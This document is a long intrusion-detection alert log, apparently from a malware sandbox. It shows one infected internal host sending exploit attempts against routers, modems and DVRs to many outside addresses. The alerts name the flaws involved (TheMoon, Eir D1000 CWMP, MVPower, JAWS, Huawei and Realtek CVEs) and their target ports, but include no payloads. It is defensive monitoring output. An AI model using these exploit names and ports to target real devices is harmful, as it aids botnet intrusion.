ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.66.43.143

Timestamp:	03/18/24-09:59:40.381656
SID:	2018132
Source Port:	57022
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 4.225.160.97

Timestamp:	03/18/24-10:00:18.996358
SID:	2030092
Source Port:	45682
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 181.24.19.129

Timestamp:	03/18/24-09:58:38.739562
SID:	2023548
Source Port:	49858
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 186.6.222.88

Timestamp:	03/18/24-09:58:44.096473
SID:	2023548
Source Port:	36776
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.65.64.5

Timestamp:	03/18/24-09:58:54.795839
SID:	2018132
Source Port:	50964
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 146.190.167.132

Timestamp:	03/18/24-10:00:14.782675
SID:	2025883
Source Port:	35434
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 35.190.2.113

Timestamp:	03/18/24-09:59:53.979177
SID:	2025883
Source Port:	34368
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 193.201.190.239

Timestamp:	03/18/24-09:59:42.121599
SID:	2025883
Source Port:	52226
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 95.12.209.68

Timestamp:	03/18/24-09:58:24.189399
SID:	2023548
Source Port:	57344
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 118.31.187.122

Timestamp:	03/18/24-09:58:52.060569
SID:	2025883
Source Port:	47910
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 142.93.38.172

Timestamp:	03/18/24-10:00:15.240466
SID:	2025576
Source Port:	55338
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 86.178.198.25

Timestamp:	03/18/24-09:57:00.651772
SID:	2023548
Source Port:	41220
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 184.98.163.94

Timestamp:	03/18/24-09:59:40.750322
SID:	2023548
Source Port:	42496
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.195.71

Timestamp:	03/18/24-09:59:56.818232
SID:	2018132
Source Port:	44666
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 144.196.230.79

Timestamp:	03/18/24-09:57:03.627937
SID:	2025576
Source Port:	53616
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 97.118.155.173

Timestamp:	03/18/24-09:59:26.018916
SID:	2023548
Source Port:	37486
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 99.225.48.75

Timestamp:	03/18/24-10:00:15.918771
SID:	2023548
Source Port:	42322
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 109.230.43.72

Timestamp:	03/18/24-10:00:16.440002
SID:	2025576
Source Port:	43028
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 104.89.78.52

Timestamp:	03/18/24-09:59:40.004092
SID:	2025576
Source Port:	40152
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 201.68.189.82

Timestamp:	03/18/24-09:59:50.434536
SID:	2023548
Source Port:	58714
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 27.237.206.203

Timestamp:	03/18/24-09:58:22.616509
SID:	2023548
Source Port:	57030
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 204.117.211.14

Timestamp:	03/18/24-10:00:10.987267
SID:	2030092
Source Port:	50500
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 92.154.17.72

Timestamp:	03/18/24-09:59:53.018498
SID:	2025576
Source Port:	47562
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 94.181.68.10

Timestamp:	03/18/24-09:59:16.277196
SID:	2023548
Source Port:	48648
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.65.194.175

Timestamp:	03/18/24-09:58:28.956074
SID:	2018132
Source Port:	44052
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 2.143.11.88

Timestamp:	03/18/24-10:00:00.455177
SID:	2023548
Source Port:	46216
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 170.199.249.136

Timestamp:	03/18/24-10:00:05.812588
SID:	2023548
Source Port:	46780
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 185.99.185.76

Timestamp:	03/18/24-09:58:45.352163
SID:	2025576
Source Port:	44996
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 107.175.159.85

Timestamp:	03/18/24-09:58:56.034377
SID:	2030092
Source Port:	35352
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound - Source IP: 192.168.2.23 - Destination IP: 210.123.46.213

Timestamp:	03/18/24-09:58:15.964898
SID:	2027339
Source Port:	60632
Destination Port:	52869
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 175.232.114.38

Timestamp:	03/18/24-09:58:28.469576
SID:	2023548
Source Port:	44530
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 98.160.120.121

Timestamp:	03/18/24-09:56:56.741142
SID:	2018132
Source Port:	35940
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 50.2.48.179

Timestamp:	03/18/24-09:58:44.219216
SID:	2030092
Source Port:	47428
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 96.46.108.112

Timestamp:	03/18/24-09:59:49.052678
SID:	2023548
Source Port:	40986
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 13.235.184.48

Timestamp:	03/18/24-10:00:14.886430
SID:	2030092
Source Port:	46106
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 79.221.242.146

Timestamp:	03/18/24-09:57:05.955824
SID:	2025883
Source Port:	32808
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 94.49.205.172

Timestamp:	03/18/24-10:00:01.881898
SID:	2023548
Source Port:	58370
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 118.63.49.186

Timestamp:	03/18/24-09:59:24.374662
SID:	2023548
Source Port:	37036
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 175.228.156.82

Timestamp:	03/18/24-09:58:12.314971
SID:	2023548
Source Port:	42124
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 111.202.89.239

Timestamp:	03/18/24-09:59:57.091254
SID:	2025883
Source Port:	34180
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 14.76.244.211

Timestamp:	03/18/24-09:57:08.069622
SID:	2023548
Source Port:	56182
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 219.69.7.15

Timestamp:	03/18/24-09:59:10.011352
SID:	2023548
Source Port:	47158
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 69.61.68.39

Timestamp:	03/18/24-09:59:18.053108
SID:	2025576
Source Port:	46718
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 187.121.71.41

Timestamp:	03/18/24-09:58:22.175745
SID:	2023548
Source Port:	36290
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.179.182

Timestamp:	03/18/24-09:58:18.056350
SID:	2018132
Source Port:	39478
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 34.200.196.158

Timestamp:	03/18/24-09:58:14.411265
SID:	2025576
Source Port:	49218
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 23.219.44.58

Timestamp:	03/18/24-09:59:19.205634
SID:	2025883
Source Port:	59040
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 179.235.85.170

Timestamp:	03/18/24-09:57:00.587332
SID:	2023548
Source Port:	58274
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 47.201.29.32

Timestamp:	03/18/24-09:58:13.895629
SID:	2023548
Source Port:	49536
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 121.184.46.28

Timestamp:	03/18/24-09:59:49.344073
SID:	2023548
Source Port:	57794
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 184.24.197.211

Timestamp:	03/18/24-09:59:37.731814
SID:	2025883
Source Port:	49882
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 104.165.56.89

Timestamp:	03/18/24-09:59:39.918280
SID:	2025576
Source Port:	38068
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 182.93.114.140

Timestamp:	03/18/24-09:59:10.030799
SID:	2025883
Source Port:	60420
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 190.18.192.127

Timestamp:	03/18/24-09:59:09.644519
SID:	2023548
Source Port:	44802
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 38.28.174.40

Timestamp:	03/18/24-09:56:59.475469
SID:	2030092
Source Port:	52180
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 34.111.116.15

Timestamp:	03/18/24-09:58:22.136155
SID:	2023548
Source Port:	47558
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 157.112.172.223

Timestamp:	03/18/24-09:59:26.421173
SID:	2025883
Source Port:	56834
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 82.172.181.47

Timestamp:	03/18/24-09:59:48.465315
SID:	2023548
Source Port:	54816
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 99.234.219.78

Timestamp:	03/18/24-09:59:43.087306
SID:	2023548
Source Port:	45696
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 5.212.105.153

Timestamp:	03/18/24-09:58:21.423728
SID:	2023548
Source Port:	34170
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.145.238

Timestamp:	03/18/24-09:59:49.123013
SID:	2018132
Source Port:	47560
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 160.16.137.118

Timestamp:	03/18/24-09:58:47.295670
SID:	2030092
Source Port:	53312
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 97.118.155.173

Timestamp:	03/18/24-09:59:25.872429
SID:	2023548
Source Port:	37472
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 129.208.96.147

Timestamp:	03/18/24-09:59:32.924482
SID:	2023548
Source Port:	34000
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 116.51.25.110

Timestamp:	03/18/24-09:59:59.583317
SID:	2025576
Source Port:	60500
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 18.155.81.181

Timestamp:	03/18/24-09:58:59.576319
SID:	2025883
Source Port:	56438
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.205.202

Timestamp:	03/18/24-10:00:20.732179
SID:	2018132
Source Port:	43018
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 18.238.21.125

Timestamp:	03/18/24-09:58:44.421994
SID:	2025883
Source Port:	55426
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 156.77.139.90

Timestamp:	03/18/24-09:58:32.277673
SID:	2829579
Source Port:	46454
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 173.35.141.21

Timestamp:	03/18/24-09:59:13.155309
SID:	2023548
Source Port:	46766
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 47.5.196.147

Timestamp:	03/18/24-09:59:09.990667
SID:	2023548
Source Port:	40210
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 34.226.28.131

Timestamp:	03/18/24-09:58:37.008199
SID:	2025576
Source Port:	46724
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 104.65.83.59

Timestamp:	03/18/24-09:59:59.634974
SID:	2025576
Source Port:	33548
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 115.3.47.98

Timestamp:	03/18/24-09:58:56.079438
SID:	2023548
Source Port:	44530
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 173.197.46.105

Timestamp:	03/18/24-09:59:17.284260
SID:	2023548
Source Port:	56446
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 179.190.223.180

Timestamp:	03/18/24-09:59:33.945424
SID:	2023548
Source Port:	60968
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 69.173.209.98

Timestamp:	03/18/24-09:59:50.335175
SID:	2023548
Source Port:	39788
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 2.19.201.24

Timestamp:	03/18/24-09:57:00.084611
SID:	2025883
Source Port:	52388
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 35.76.62.210

Timestamp:	03/18/24-09:58:43.006582
SID:	2025883
Source Port:	42546
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound - Source IP: 192.168.2.23 - Destination IP: 191.61.203.154

Timestamp:	03/18/24-09:58:52.889383
SID:	2027339
Source Port:	46666
Destination Port:	52869
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 189.245.160.143

Timestamp:	03/18/24-09:59:40.653220
SID:	2025576
Source Port:	41834
Destination Port:	8080
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 138.0.73.169

Timestamp:	03/18/24-09:59:05.828123
SID:	2025883
Source Port:	48678
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.64.165.235

Timestamp:	03/18/24-09:59:51.302600
SID:	2018132
Source Port:	39150
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 154.89.230.18

Timestamp:	03/18/24-09:59:51.525103
SID:	2025883
Source Port:	49402
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 190.2.58.152

Timestamp:	03/18/24-09:59:05.978076
SID:	2025883
Source Port:	59280
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 84.35.121.8

Timestamp:	03/18/24-09:58:27.132401
SID:	2025883
Source Port:	35844
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 18.225.57.211

Timestamp:	03/18/24-09:59:25.825371
SID:	2030092
Source Port:	60092
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 95.101.63.107

Timestamp:	03/18/24-10:00:16.246875
SID:	2025576
Source Port:	56356
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 62.27.37.234

Timestamp:	03/18/24-10:00:20.349425
SID:	2025883
Source Port:	49184
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 120.136.129.99

Timestamp:	03/18/24-09:59:52.967869
SID:	2030092
Source Port:	41278
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.65.227.33

Timestamp:	03/18/24-09:57:07.733838
SID:	2018132
Source Port:	57078
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 197.27.100.58

Timestamp:	03/18/24-09:58:38.673679
SID:	2023548
Source Port:	54066
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 88.99.216.194

Timestamp:	03/18/24-09:59:43.960566
SID:	2030092
Source Port:	56928
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 112.177.254.224

Timestamp:	03/18/24-09:59:16.331131
SID:	2023548
Source Port:	55206
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 220.134.235.161

Timestamp:	03/18/24-09:59:45.367271
SID:	2025883
Source Port:	53842
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 41.239.61.255

Timestamp:	03/18/24-10:00:11.614852
SID:	2829579
Source Port:	48710
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 68.114.230.38

Timestamp:	03/18/24-09:57:07.998829
SID:	2023548
Source Port:	40996
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 66.222.114.162

Timestamp:	03/18/24-10:00:06.560302
SID:	2025576
Source Port:	42682
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 50.17.197.42

Timestamp:	03/18/24-09:59:52.752661
SID:	2025576
Source Port:	52318
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 52.66.201.0

Timestamp:	03/18/24-09:59:57.371218
SID:	2030092
Source Port:	53672
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 67.211.69.254

Timestamp:	03/18/24-09:59:54.311935
SID:	2030092
Source Port:	60532
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 101.62.198.198

Timestamp:	03/18/24-09:57:05.950389
SID:	2025883
Source Port:	42340
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 156.235.103.211

Timestamp:	03/18/24-09:59:48.273022
SID:	2023548
Source Port:	58532
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.65.202.91

Timestamp:	03/18/24-09:57:00.067831
SID:	2018132
Source Port:	52628
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 121.74.80.205

Timestamp:	03/18/24-09:58:12.235389
SID:	2023548
Source Port:	59394
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 183.113.78.91

Timestamp:	03/18/24-09:59:16.135438
SID:	2023548
Source Port:	53514
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 186.223.127.222

Timestamp:	03/18/24-09:57:03.609020
SID:	2023548
Source Port:	45726
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 192.9.237.59

Timestamp:	03/18/24-09:59:24.925504
SID:	2030092
Source Port:	52262
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 175.255.196.63

Timestamp:	03/18/24-09:59:16.608133
SID:	2023548
Source Port:	55338
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 24.161.61.21

Timestamp:	03/18/24-10:00:21.167620
SID:	2023548
Source Port:	59550
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 111.202.53.185

Timestamp:	03/18/24-09:58:16.422218
SID:	2023548
Source Port:	37186
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

